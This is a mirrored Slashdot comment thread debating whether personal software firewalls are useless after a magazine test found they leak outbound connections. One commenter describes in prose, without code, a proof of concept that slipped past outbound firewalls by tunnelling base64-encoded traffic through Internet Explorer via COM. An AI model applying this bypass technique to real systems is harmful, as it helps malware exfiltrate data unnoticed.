Slashdot Mirror
Personal Firewalls Mostly Useless, Says Mail & Guardian
hweimer writes "More and more security researchs come to the conclusion that personal firewalls are ineffective in controlling outbound traffic. An article in the Mail & Guardian online mentions a test that 'showed that the software often causes more problems than it solves. Not one of the six firewall programs the magazine tested, regardless of whether commercial or freeware, could prevent all attempts from the test programs at establishing outgoing connections between the PC and the internet.' Simple PoCs are available, too."
More and more security researchs come to the conclusion that personal firewalls are ineffective in controlling outbound traffic.
The article's about personal software firewalls, not personal hardware firewalls. Furthermore, the fact that personal software firewalls are useless and buggy is not really a new discovery.
Push Button, Receive Bacon
Well, that's what happens when you try and introduce a complex topic like network security into the consumer market, and subsequently fail at that task. They (the software manufacturers) fail not only in raising a suitable amount of awareness (if every single computer on the planet was behind a firewall, how many worms/malware would this stop?), but they also fail to do the job properly (not blocking outbound traffic) for those who do install their software.
There is nothing interesting going on at my blog
As a lesbian, I must protest to this offensive and disparaging comment.
Yes, they may be ineffective in controlling outbound traffic. However, that's not the real point of a personal firewall.
Without a personal firewall, users have a huge issue with inbound traffic when it comes to security, especially in the Windows "territories." I'll never forget the day that I left open an unpatched WinXP box after a fresh install. I watched all of the script kiddies and automated worms go at it from my passive OpenBSD monitoring box. That machine was hacked in under ten minutes just because I left it there, open to the Internet. So, useless? No.
Not one of the six firewall programs the magazine tested, regardless of whether commercial or freeware, could prevent all attempts from the test programs at establishing outgoing connections between the PC and the internet.
First, nothing is perfect. Second, if some nasty program/spyware/adware got in, then it's too late already. The best thing is to prevent them getting in to begin with. Besides, most people don't know the difference between what should and should not be allowed to have access. I do some tech support for friends and family and it really gets annoying after the fifteenth call, "Should I let FooBar21.exe access to the Internet?" I finally went with the policy of disabling any sort of outbound filtering in whatever firewall I setup for people I will be "supporting."
Personal firewalls do not block outbound connection because it is a pain in the ass to decide what can pass or not. I mean, did you ever try some windows firewall that allows that? You get hundred of warnings from obscure services trying to send unknown data to somewhere you do not want to know. Users are clueless about it, they will just check the box that say "shut up and hack by box" if it prevents further messages from appearing.
Stupidity is the root of all evil.
A firewall is a *device* between a device that needs 'protection' (usually a Windows PC), and an Internet connection. Keyword *device*, as in a seperate physical piece of equipment. A piece of software running *on* a Windows PC is as vulnerable as the underlying system it runs on. Eg, completely useless. 'Software Firewall' is an oxymoron.
Not running Windows, but instead running either a proprietary platform or (preferred) something unix-based. The simplest is a simple one-way NAT (outbound connections allowed, inbound connections impossible without a specific, intentional mapping). These of course only protect against active outside attacks, and not against trojan/virus emails or websites visited from the PC. The most effective method of avoiding those is to avoid use of and remove (to the extent possible) all Microsoft email clients and web browsers from the PC.
Did they test zonealarm? Because even with my best efforts to circumvent it (for testing), it's still able to block everything. Even as an Admin user, it's not possible to stop the service unless you "officially" exit the program. I've been using it for years, and I haven't once ever had a program that it didn't block (if I chose to block it). Even test software which was spesifically meant to try to find holes in personal firewalls. The new version does other handy things too, like keeping an eye on software which tries to monitor your keyboard/mouse (such as keyloggers) and giving you the option to block them from doing that. Very handy.
I'm just curious, since the article doesn't mention it, but which firewalls were tested? I've look at the website for the magazine that did the testing, but my German is rather rusty and I can't seem to find the original article. The only one mentioned in the article is the Windows XP firewall.
I stole this sig from a more creative user.
The personal or desktop firewall is not supposed to be your first line of defense, it's supposed to be your last line of defense.
I recommend that people use both a hardware and software firewall, the hardware firewall protects you from the Internet in general. The software firewall protects you from the other computers on your local network.
But when it comes down to it, a firewall is as strong as it's weakest link, which is almost always the enduser. Running as admin while browsing, downloading software from untrusted sources, don't blame the firewall for user stupidity.
Most of the "secured" computers I've seen have 3, 4 or more firewalls installed and "working". If one firewall isn't stopping outbound connections, go install another one, you'll be twice as secure then.
Deleted
The article (to my view) didn't mention any of the names of the programs, and I don't speak or read German, so I don't know how to find the names.
But I would swear by a nifty little app (for mac), Little Snitch which does seem to block both outgoing and incoming traffic perfectly.
It has been a nervous year, with people beginning to feel like Christian Scientists with appendicitis.
Blocking outbound traffic has been very useful for spanking people who think running Kazaa/eMule/BitTorrent/etc. at work is a good idea. Or for blocking access to outgoing SMTP so users have to use the corporate mail box, etc..
Trolling is a art,
Mac users don't think you are safe because you aren't running windows. It's amazing the number of Apps that "phone home". A great tool for Mac OS X egress filtering is Little Snitch. It's cheap and easy to use.
Strange women lying in ponds distributing swords is no basis for a system of government.
The article makes a number of critical errors that impact its credibility.
The article expounds on the dangers of Javascript, but fails to mention ActiveX. I suspect the author had heard about "scripting" being a security hole and assumed incorrectly that the other person was talking about Javascript. JS is inconsequential compared to ActiveX when it comes to actual risk.
Additionally, when it claims that AV software essentially supersedes any firewall in terms of protection, it fails to consider the security nightmares in Windows. Specifically, through the trust relationships, you can modify registry settings and execute code on computers without your viral code ever touching the disk on the machine by doing it remotely from another computer. Because memory scanning is essentially ineffective, modern AV programs cannot effectively protect against this, which is why most security companies suggest combining AV with a Firewall. Plus, there are regular buffer overflow exploits that have the same effect: Code running without touching the disk. Where do they come from? Over the wire. Code Red and Nimda are good examples of attacks that were stopped by even the most basic firewalls. Safe browsing had no effect whatsoever on whether a user was infected.
Finally, the article fails to take into consideration the thought that goes into the automatic rule creation most firewalls come with now. Developers understand that users demand convenience and security, and work to find a good match of both. To this effect, most modern desktop firewalls will use signature based rules (so that a malicious program has to do more than just be named after a trusted program) to create a basic rule that allows that program outbound access. The ports are not being just "left open" willy nilly, they are connected to known programs and watched. Some firewall programs even watch for threadjacking malware that would inject itself directly into trusted programs, that gives even more protection.
The author of the article should reevaluate his or her knowledge of internet security. It is likely that the increasing ease of use has been interpreted as a drop in protection, but this is not the case. A secure system is one that uses a heterogeneous mix of disk and network protection.
A fundamental concept in computing now-a-days is that software designers attempt to do as much thinking for the end user as possible. This is a generally good thing, as the easier/more-intuitive software is to use, the more people will use it. That point aside, this can be a negative thing as it keeps users from needing to understand what they are actually doing. Using computers NEEDS at least a basic understanding of what's going on.
I don't mean everyone should study the TCP/IP stack and fully grasp ports and such, but seriously....you can't just show someone what a car does & explain the controls and then expect them to be able to drive properly & safely. It takes training & study.
The same is true with computers. I'm not suggesting an 'internet license' or anything, but I would recommend that high school core classes at least provide the basics of the underlying fundamentals of computing. Until someone understands what those firewalls are for, they will never reach a truly useful state.
Brad
So if I have a hardware firewall in my router is a software firewall useful as a last ditch defense? Or is it nothing more than an annoyance and resource hog?
Download my free songs!
Or for preventing a compromised box from DOSing the rest of the world.
Could not find the list of the six software tested. Dont know if Zone Alarm was tested and found to be defective too. But I would be surprised. Everytime I update FireFox, Zone Alarm knows that the exe file has changed and alerts me to renew permission for it to connect to the internet.
sed -e 's/Chuck Norris/Rajnikant/g' joke > fact
The issue with most desktop software firewalls that attempt to control outbound connections is that they have no idea in advance what constitutes a valid program and what doesn't. So they ask the user, who in most cases is unable to answer the question. The only information typically provided is the executable name, and in many cases it's a generic one (like svchost.exe) that leaves even an experienced user without the ability to make an informed decision.
The problem is that this trains users to ignore the prompts and habitually click "allow" or "deny" (usually because they find out the hard way that stuff breaks when they click "deny"). The result is far worse than if there were no attempts to control outbound access, because most of these firewalls (Zonealarm in particular) use similar techniques for *inbound* traffic too... they will prompt the user when a program opens a listening port, and if they hit "allow" will enable global inbound traffic to that port, creating a hole that otherwise wouldn't have been there.
This happens regularly in practice- I've seen it over and over again with my small business consulting clients. Although technically an outbound software firewall with program control could be a good last-ditch effort to block malware that has managed to get installed and running, on a practical basis they cause more problems than they solve.
-R
I haven't found on TFA , but then again i read it on a rush because my boss was in the room, but i guess they performed the test the way most regular users use a personal firewall.
This means press install, press next, next, next,next, OK and done I have my own personal protection!
If you take the time to tune the software firewall, i'm pretty sure you would have much better results.
What is best in life? To crush your enemies, to see them driven before you and to hear the lamentations of their women.
I still remember the lone time I got virused, as it also was the lone time when I put a non-firewalled machine on the internet.
Basically the story is that I had managed to fry my home machine, didn't have a second computer at the time, but hey, looks like I got enough older parts for one (or a couple of them.) Stupidly enough, the firewall program (Sygate was my favourite at the time) was among the few things I had never backed up, but otherwise I could have a computer to play with in an hour or so.
Now I could have, of course, went and bought some security program, or could have downloaded it at work and burned it on a CD, or whatever. I chose to just do a sacrificial install instead. As in, you know, install Windows, go online unprotected long enough to download a firewall, reformat, reinstall Windows. I fully expected the first install to get virused, but that's ok, since it would get reformatted a few minutes later.
It also was Windows 2000, not XP, so no activation hassle.
Well... let's just say that what I didn't expect was how fast the thing got virused. I expected it to get virused eventually, yes, but it got owned within a couple of minutes. Scary.
A polar bear is a cartesian bear after a coordinate transform.
Even though I'm behind a firewall, I use ZoneAlarm on all of my PCs so that I can catch what's communicating with the Internet and what's not. So far, it's done superbly well as far as I can tell.
For example, every time I play a media file in Windows Media Player, it tries to connect to the Internet not once but twice - once when Media Player fires up and once again after it's fnished! Excuse me? Exactly what is Media Player trying to figure out? Well, whatever it is, it's none of their damned business. Check "Remember this setting", click "Deny", and done.
Every time a process tries to act like a server, ZA also notifies me of that as well. It's a bit of a pain when I fire up a game server for the first time and the pop-up balloon interferes with the screen (whoops), but again it just shows that it's at least doing what it's supposed to do.
ZoneAlarm has its share of issues, but it clearly goes with the attitude of "better safe than sorry". There have been some rare times where the program itself doesn't start, for whatever reason, but its service gets started. On those rare occasions I've noticed that the service, if it can't communicate with the control daemon, or whatever you want to call it, it just blocks all network access. It could have just allowed everything instead and there'd be no way of knowing if it's working or not. Personally, I'd rather have it block all access. Not only does that let me know that there's a problem, but it's certainly keeping the PC's network connection secure.
Using a hardware firewall for inbound and ZA for outbound connections makes perfect sense as far as I'm concerned. It's not trouble-free, but they've been getting better at its stability over the past several revisions from what I can tell.
The Overrated mod is for reversing inappropriate, positive mods, not for voicing disagreement with a post.
Some of the problems with 'virtual firewalls' can be solved through real firewalls on ... virtual machines
(i.e. Sieve at http://sievefirewall.sourceforge.net/ or at http://www.vmware.com/vmtn/appliances/directory/24 5)
If slashdot, digg and friends were to link to printable versions, how long would it take for those sites either to remove the print version or to put their ads there?
Instant Karma's gonna get you, Gonna knock you right on the head (John Lennon, 1970)
This is why I run winpooch http://winpooch.free.fr/. It's not a firewall, but it does allow me to monitor my outgoing connections, and apply rules to them. For example, I can have it prompt me for every outbound, just announce when an outbound connection is established, or allow all outbound. Same thing with inbound. More complex rule sets are allowed as well.
It's not gonna save me from a worm itself, but it will tell me when I have a worm or rootkit making outbound connections.
And it allows me to use ClamWin to do on access scanning, tells me whenever an application tries to change the registry or system files, and provides a simple method to determine most of the potentially damaging processes running on my machine.
Best of all it's opensource.
Sometimes the best solution is to stop wasting time looking for an easy solution.
I used to work tech support for Verizon DSL (ick) and we saw problems with this all the time. People would have Mcafee installed and it would spontaneously decide to deny IE outbound access. (Now, customers using IE is a whole separate can of worms, but I don't feel like writing a novel so I won't go into that here...I "fixed" many computers by removing the IE shortcut from the desktop and installing Firefox.) The Mcafee issue happened frequently enough that I doubt it was something that the user misconfigured, some of the people didn't even know they had Mcafee (it came with the computer). The symptoms would be: you could ping anything you wanted, but any attempt at websurfing would time out, even to other devices on the LAN (like the cheap routers we supplied). I even saw times where Mcafee would deny access to the 192.168.x.x LAN address but allow general internet access. We didn't support firewalls when I worked there, so the customer was instructed to disable the firewall and then access came back. Trying to use a firewall to block *outbound* traffic is kind of dumb. If there's malicious software on your computer, it's already too late for more software to solve the problem.
And where do you insert this "device" between your PC and the wireless router in the coffee shop or hotel romm in which you're sitting? Wave it around in mid-air or something?
Besides that, the most useful purpose of these things isn't against trojans that someone's running because they're an idiot, it's software such as media players insisting on phoning home (for example, the "Microsoft Windows Media Configuration Utility" connection attempt that occurs when WM9 tries to update itself).
There are ways around personal firewalls, therefore personal firewalls are useless.
So says an article linked by an article linked by an article that I can't really read. Pardon me if I am not convinced.
I'm quite content with the personal firewall I have. It stops lots of outbound connections from applications that like to phone home. If there is an app on my system that searches for IE windows and uses them to surrepticiously send data out -- I'm already f*d. Fortunately, my firewall blocks IE so I'm not vulnerable to that one. (It could use Firefox though).
Okay, we are talking about Windows users: they will simply click 'Yes' to anything that pops up on the screen.
Click here or here.
My view has always been using a combination of things that help is th ebest idea. Using a router that has a hardware firewall + a software firewall + antivirue + a secure browser(firefox) is a decent way to keep safe. This won't stop everything, but it's better than surfing around with no protection. Also add not doing stupid things to that equation for maximum protection.
I always get a kick out of people who set their firewall to prompt on every attempt to access the net, especially when they're running as admin on their boxes.
Even without the user running as admin, it's fairly easy to create a program to bypass outgoing firewalls. Basically the trick is it piggypack your communications over an existing application that's trusted.
Nearly everybody is going to trust IE (or Firefox, or whatever browser) to access the network. All you have to do is figure out a way to use that program to do your communications for you.
I once wrote a proof of concept app (in VB no less!) that used IE to do exactly this. I setup a simple piece of server software that accepted requests via HTTP GETs and returned the response as base64 encoded text in an HTML body. When my app needed to access remote data I just used IE to request that data from the server and then base64 decoded it. I could have also done something like have the server software act as a proxy so I could request any remote data I wanted, even if it wasn't hosted by my server. It was trivial.
The best part was that *every* major outgoing firewall failed to detect this attempt, despite that fact they claim to be able to tell when one application is using another to piggyback communications. Perhaps it was the way the COM interface worked, I'm not sure... but it never failed and never prompted me to allow it to happen.
Linux has IP Tables which is very good for the job. Is it as good as BSD? I would argue less time consuming if you already run Linux, but it's not the same.
e nt=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q= iptables&btnG=Search
Notes: I believe for stateful packet inspection, the kernel needs ip_conntrack and a few other things in it. Most distro kernels have this but it's worth double checking. From there, it's learning the IP tables syntax which isn't hard after going through one of the many examples out there. Once you get logging going, check out intrusion prevention systems!
http://www.google.com/search?hs=3PG&hl=en&lr=&cli
http://www.maxineudall.com/2010/02/should-economists-be-sued-for-malpractice.html
The response I get (yes, I'm the guy who wrote the tutorial) is that people find it quite useful.
The fact that it includes a few tips on how to give spammers a hard time helps too I guess.
-- That grumpy BSD guy - http://bsdly.blogspot.com/
Of course, they aren't perfect. But I've a got a friend who was having a recurring problems with varioius malware. I set her up with Zone Alarm, Anti-Vir, Ad Aware and advised her to download Firefox to browse with rather than using IE. Without Zone Alarm to block the malware traffic while Anti-Vir downloaded updates to its signature files, her internet connection was saturated with so much malware traffic that she couldn't connect to anything else. Further, she gets to see what programs try to access the internet.
I love how, whenever I go to my grandparents to fix their computer (after they've dealt with their ISP's tech support) the ethernet cable is always running straight to the PC and bypassing the router. It's hard enough to get average Joe to understand the usefulness of a hardware routing/firewall device, but when the ISP is actively having them bypass it I can see a software firewall being somewhat useful at times.
An incomplete defense is useless in a chess game because your opponent will attack via the hole you left and you'll lose. If you're defending against ego-driven attackers or attackers who target you personally then it's appropriate to try for a security posture with no holes in it.
Mass-produced malware is usually not built for pride of workmanship. It is commercial software built to make money and is not a fraction better than it needs to be.
The right question to ask about effectiveness is what fraction of the spyware in circulation will be controlled by Zone Alarm and its kin. We accept a detection rate of 50-80% from antispyware programs. The threshold for a program like Zone Alarm should be higher because it has to be worth the hassles it causes, of course.
Those hassles are probably inevitable. If you try to control outgoing traffic you are trying to add a feature that should have been in the OS, namely a new permissions system. Turf wars with the OS and destabilization due to hooking deep APIs are certain to happen. Historically if you attempted to touch the Windows network stack (PGPNet, for example, and the Freedom software forced me into a wipe and reinstall) you broke it.
Outbound traffic controls are harder to subvert but less effective if you do them outside the client machine. How can a separate firewall box know whether a port is being opened by BitTorrent or by CoolWebSearch?
openSuSE 10.1 actually makes it sickeningly easy to configure a firewall, subnet masquerading, DNS merging, and port forwarding. It took less than an two hours to get it all working (including dial-up and DHCP network alteration of the DNS forwarding.) IIRC it took almost two days to get it working with RedHat 5.2.
I realize it's not a fair comparison, as there is over 5 years of dev work in between the two, but the point is you don't need much knowledge, just a spare dual-nic box that'll run one of the more recent distros.
A friend of mine is a bit annoyed. It was faster and easier to set up SuSE's firewall and have it working reliably than his WinXP dial-up node. :P
I do not fail; I succeed at finding out what does not work.
This article basically says personal firewalls are useless because there are things they can't prevent. Recently I've seen someone argue antivirus software is useless because they aren't 100% accurate and won't catch all your virii. Okay well I have some screwdrivers at home. I want to put together a cupboard this evening. I'll only need the phillips head. Should I throw out the flathead since it won't do all my work for me? Moronic.
Yes, software firewalls have their problems. Yes, they do require some knowledge to use correctly (as does almost all software!)
Personally I use a hardware firewall for incoming, a software firewall for inbound, I do run as admin because Windows just isn't designed to be run well from an unprivlleged account. I use antivirus too though I do switch it off if my computer's going to be doing something CPU or disk intensive AND I'm not doing anything I consider risky.
Furthermore you can't test 6 bits of firewall software and extrapolate that they're all garbage from the sample.
These posts express my own personal views, not those of my employer